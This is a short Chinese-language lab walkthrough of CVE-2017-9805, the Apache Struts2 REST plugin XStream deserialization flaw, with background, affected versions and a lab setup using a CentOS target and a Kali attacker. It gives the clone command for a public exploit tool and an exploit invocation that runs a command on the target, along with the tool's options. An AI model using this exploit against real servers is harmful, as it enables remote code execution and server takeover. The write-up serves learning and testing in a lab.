漏洞背景
2017年9月5日,Apache Struts 2官方发布了一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞, Struts2 REST插件的XStream组件存在反序列化漏洞,使用带有 XStream实例的 XStreamHandler进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。
漏洞影响范围
Struts 2.3.x全系版本(根据实际测试,2.3版本也存在该漏洞)
Struts 2.5 - Struts 2.5.12
实验环境
靶机:192.168.123.16 (centos7)
攻击机:1192.168.123.157(Kali)
CVE-2017-9805利用
下载CVE-2017-9805
git clone
https://github.com/mazen160/struts-pwn_CVE-2017-9805
进入目录,运行struts-pwn.py在/下创建一个ok目录
cd struts-pwn_CVE-2017-9805
python struts-pwn.py --exploit --url 'http://192.168.123.16:8080/orders.xhtml' -c 'mkdir /ok'
参数
-h, --help show this help message and exit
-u URL, --url URL Check a single URL.
-l USEDLIST, --list USEDLIST
Check a list of URLs.
-c CMD, --cmd CMD Command to execute. (Default: 'touch /tmp/struts-pwn')
--exploit Exploit.
查看centos7的/下有没有ok目录
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
你可能喜欢